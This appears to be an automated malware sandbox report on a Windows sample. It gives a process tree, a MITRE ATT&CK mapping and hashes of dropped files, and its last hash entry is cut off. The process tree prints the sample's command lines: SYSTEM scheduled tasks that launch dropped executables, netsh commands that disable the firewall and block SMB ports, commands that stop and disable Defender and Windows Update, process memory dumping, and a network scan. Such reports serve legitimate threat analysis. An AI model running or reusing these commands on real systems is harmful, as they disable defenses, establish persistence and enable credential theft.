  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "armegntcm" /ru system /tr "cmd /c C:\Windows\ime\pnreyic.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:212
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "armegntcm" /ru system /tr "cmd /c C:\Windows\ime\pnreyic.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:348
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "szvqemctv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F"
  2⤵
  PID:1832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3696
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "szvqemctv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2252
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rbtkfiyzt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3276
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "rbtkfiyzt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2676
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:832
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4644
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:396
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3352
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4060
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1624
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2588
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4972
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4232
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2932
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1376
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1408
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4532
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:3768
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1072
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:1164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:4204
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3960
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1912
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:1112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2284
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:728
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:1116
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4572
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:372
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:3200
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1688
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4500
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3124
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  PID:832
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4824
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2908
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1628
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 780 C:\Windows\TEMP\nblmptktz\780.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4144
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  PID:4948
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 332 C:\Windows\TEMP\nblmptktz\332.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2488
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 2140 C:\Windows\TEMP\nblmptktz\2140.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:524
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 2684 C:\Windows\TEMP\nblmptktz\2684.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3288
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 2832 C:\Windows\TEMP\nblmptktz\2832.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4792
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 2844 C:\Windows\TEMP\nblmptktz\2844.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:728
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 3172 C:\Windows\TEMP\nblmptktz\3172.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1252
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 3948 C:\Windows\TEMP\nblmptktz\3948.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3284
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 4036 C:\Windows\TEMP\nblmptktz\4036.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3044
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 996 C:\Windows\TEMP\nblmptktz\996.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4060
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 772 C:\Windows\TEMP\nblmptktz\772.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:312
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 1136 C:\Windows\TEMP\nblmptktz\1136.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4508
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 1812 C:\Windows\TEMP\nblmptktz\1812.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3972
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 1828 C:\Windows\TEMP\nblmptktz\1828.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3276
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 3640 C:\Windows\TEMP\nblmptktz\3640.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3300
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 860 C:\Windows\TEMP\nblmptktz\860.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1264
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 3532 C:\Windows\TEMP\nblmptktz\3532.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3732
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 440 C:\Windows\TEMP\nblmptktz\440.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3644
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\nblmptktz\etgfqftjv\scan.bat
  2⤵
  PID:3504
- - C:\Windows\nblmptktz\etgfqftjv\ncgcflyve.exe
    ncgcflyve.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2232
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3644
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5124
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5892

C:\Windows\SysWOW64\gykgue.exe
C:\Windows\SysWOW64\gykgue.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3836

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F
1⤵
PID:3960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:2528
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F
  2⤵
  PID:4452

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\pnreyic.exe
1⤵
PID:1864
- C:\Windows\ime\pnreyic.exe
  C:\Windows\ime\pnreyic.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2968

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F
1⤵
PID:2988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1092
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F
  2⤵
  PID:4208

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F
1⤵
PID:4900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4060
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F
  2⤵
  PID:2852

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\pnreyic.exe
1⤵
PID:5760
- C:\Windows\ime\pnreyic.exe
  C:\Windows\ime\pnreyic.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5516

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F
1⤵
PID:1400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:2264
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F
  2⤵
  PID:7096

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\gcettrccj\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\TEMP\nblmptktz\1136.dmp

Filesize
1.2MB

MD5
016e6fe9d647b75c032e67236ab2d486

SHA1
521c0c13028c4b575eb6ce66a88717d885399b15

SHA256
7e03f27ad45850b63664da6f7bb11da4ffbe5825acab0ed04723f7f1d2ae432f

SHA512
b87fe6d20a4317fa9d941357d5304ebdcf6f00621c4fe76302fc7f4656475f6094a759e8cbaccc5a7d34a37d17f3c5911ff8e175ec39a96dc8f4d7ae68cdc231

Download Submit
C:\Windows\TEMP\nblmptktz\1812.dmp

Filesize
25.7MB

MD5
7ca453b51fd4ff45ebfb3a243c4ab3fa

SHA1
ffbd8efd97de1364238e9727a4c513680e7b937d

SHA256
70f1179d5aa2f252a6bdc61eaaa4c787bdd652b76affb56c60282f3ceb31670b

SHA512
20b84bcd1f55709262e94283548bfb02209e793ded38992f444102b65ffb3203d2aafe6d3a4099dac9e5975962333fc620e57d75a0244187c133ecf5789c3102

Download Submit
C:\Windows\TEMP\nblmptktz\1828.dmp

Filesize
8.5MB

MD5
fb31358c3a36cbfc25dc5f6a68d85b83

SHA1
884f27fb3646ad413b8e9c7b64f416fe458ff1a9

SHA256
3b3e48eb7ecf75566dc72e495e8851286d1be9b8470988dc6833ea7233127b71

SHA512
b012c2343d73d850b5c0dd91fbb2ac7b406819b59e3cc8a64b4d1a2fb5ab8b0e85d319ff60174c99b026a6088b538eb36b4dd16c2d8b6f3d63f683135795a2f4

Download Submit
C:\Windows\TEMP\nblmptktz\2140.dmp

Filesize
4.1MB

MD5
285106722ff025252e6155658ebe7b4d

SHA1
463cf973fd957fbb43bb3ed0c0de53469e6ad4ef

SHA256
750fcade2d7351c272f4214c29f3ad1993b4a98578e58b419caef71cf774d7fa

SHA512
2593a1e3e43e7d8dda000b8dbc8cf59711a04874e0baa18221fb9727b16ab055d8379bee54b3e568d4f6a328525a8627a0c7bbbf243029b94e2d833ee0ca4350

Download Submit
C:\Windows\TEMP\nblmptktz\2684.dmp

Filesize
4.1MB

MD5
d96d6be8d5fe3b90525bdfbe21be680b

SHA1
b9e88bee7365339f7488f6f44ecb70e70f2b2b75

SHA256
780546e7474d7bfd773e6326d990cf1471a64e61f5e0c56c40c878956ef990f0

SHA512
bb4e59af8f5d2784d8967cd387fe1da4cde2880db180aa82b7b0bd32d4bb312d9029e2783d06b0f41696cedc96407afbf10c6fc5259f15412b793105bccfe894

Download Submit
C:\Windows\TEMP\nblmptktz\2832.dmp

Filesize
7.6MB

MD5
52e4d2bee18f6e0a9c8f996547b2a319

SHA1
50f415449d16e943dfbe409a57d0893b699d7fd9

SHA256
61a837f7fa80bf811b0936d4def4f99398cc56cf86479fa32658f789aaabe29a

SHA512
c93f1a6a1b2d86db0bcd92ab9feee2d1c615af67b0fc21807d1ce8983df28a4cf63fb76d46013c03d1108e1fb49ebb2c79197d4aa99c6de53c355d4671f6c92e

Download Submit
C:\Windows\TEMP\nblmptktz\2844.dmp

Filesize
2.9MB

MD5
763146eebac8c2c34346f1dac968f199

SHA1
a0bf527afa8c6d3c3d6bdc303d96fd1db2fb339c

SHA256
a04762b93fef6ec0ade865dd45ef27a1d957e6d09f738adece6a499b3d96a020

SHA512
9728505f969bc6651479881477087b331da774067e08c2ea17604c83878a8a2759eba99b1636baf73976046e9b8afca89855691b07156b6756754895abfe4ed0

Download Submit
C:\Windows\TEMP\nblmptktz\3172.dmp

Filesize
814KB

MD5
b58e258aa963cca2bfd30795b40312de

SHA1
1a81b87bc94a1d77ff05876eb6f9ef6d8397ab68

SHA256
8f57b11894ed6c7bccaf03f4c8c750466645eb79c0e77544a9f64a08e30554a2

SHA512
26d9c1fa41cf4e52ca7f67d81b3d7b872c63050361873972e4e048fc0b2f299e2cc9aaeae51244c52e56ca99a626790be4c0bee54c80e9110717e8b0276a279e

Download Submit
C:\Windows\TEMP\nblmptktz\332.dmp

Filesize
33.6MB

MD5
bb5d227958b194cd96d1209de3fd7fc0

SHA1
0b1825240dcfd166ef2772d37f1efa50e0294e01

SHA256
9bd11e28b1cd54c32c2c87750eb7e943503f2df133ba426340c497798004692d

SHA512
95e3c56239d46c10278aeabe4193fce98775acccb29fdc37abbc4138c5e425a8436f5f61dc4add53ffbc312936e23bb137e92358690a188af21de095cf1c63b8

Download Submit
C:\Windows\TEMP\nblmptktz\3640.dmp

Filesize
2.9MB

MD5
c97d181766b0cf191f6c15b4693e50c7

SHA1
77271f8056be0238508ef615a7ccdd42b95bc215

SHA256
ab14e4c85e5b5e61f1c9bec4a8d9cee3ca4b96327bec8ad9e9932694e1c4b23a

SHA512
8a8aa1a26fe29eadb0ff5d54d3fd71b84f878f9d76d1e3d6e00ad8441d850f81da32bce97642b839b6bfe5a0d0256a414d686acfd16af2bcafbb10dcc922ee45

Download Submit
C:\Windows\TEMP\nblmptktz\3948.dmp

Filesize
2.5MB

MD5
970581f5d39ef8c73d0e205b2be6092a

SHA1
827f9c33dfb5483b46b9487efceb8b27d62cc031

SHA256
f8b79289fe141de2be8d9c918d76def65b9aeefa28a47023b4a4e6990cc37caa

SHA512
0ed4b01525a735e100bea112ab3c7f1c49424d93ab0de54297e74721430053541307350383c36ddc7d360948a51831f58fa9bc802b4c1853eca4f5f679307a18

Download Submit
C:\Windows\TEMP\nblmptktz\4036.dmp

Filesize
21.0MB

MD5
165247c5a2a9aae550a6e55f6edfdc4e

SHA1
348bfb323828db14e09e55e9d88f1e7118bf93c5

SHA256
f509609901018967a2586c25518391310f5ca633bf1b33f76d55596193ca4c3a

SHA512
de17815d9ee7e452449256653f47b97581e54ad1a0ffd7ce44165d5fcda7c914c68c1e9d03cb4bb88afb0915d248c23e0fe0f645fb8f8ec0babed0d62f7497ea

Download Submit
C:\Windows\TEMP\nblmptktz\772.dmp

Filesize
45.9MB

MD5
8b6d3a23540a7722d707e884cf3feaf2

SHA1
a7abb0ad8739b82a65deecc561d476ff02f49e70

SHA256
d37295f6193ff07f58a83af8d00ac4926f8cceec8259f7a0c169e8ef6b6f348f

SHA512
8ce646021fd9b503aef7cd4df44167bb90f7d76cc78df0ba91966c4f19f4b05a9c3e6eda35c30d84368557f9e8cb4d9219b7b8ea288913857fc9311063fafb7b

Download Submit
C:\Windows\TEMP\nblmptktz\780.dmp

Filesize
3.3MB

MD5
29ab21ea74ac1f05177323505d26a9ba

SHA1
75e859b17f5f0d395e3c7f98830a5c598bf0b6ad

SHA256
0a2e6c5f5f4e58ae104bc586337e92d70cf05fa28358bb10c1e47b6bac049204

SHA512
69e6d3a415bfa356ac619776123fb3c7991763304d528057a45740885457037acc06cc00a1c5a0b5a7910a72a284a29f99be64b927741e9f85a76dc45d2a15dc

Download Submit
C:\Windows\TEMP\nblmptktz\996.dmp

Filesize
8.4MB

MD5
fb4b3440584fa7fc9c0353bee9d3a0df

SHA1
720254856805338d97544c5e697b41fcfd0e820e

SHA256
048c1cfc364e8364887e407064b1c83ddf99b30574cf6a2893b956ff653baa71

SHA512
b0f87b900384cfc39a7b55c1969cf8c36a592d70ceac4c7100e0f356aafb8f37c45b3e6ca22819d493773cd844ed73504e6e7ec484af478fc5c998d0950337ad

Download Submit
C:\Windows\Temp\gcettrccj\zergmt.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\nblmptktz\cntrtrctt.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\nsu4FE.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nsu4FE.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
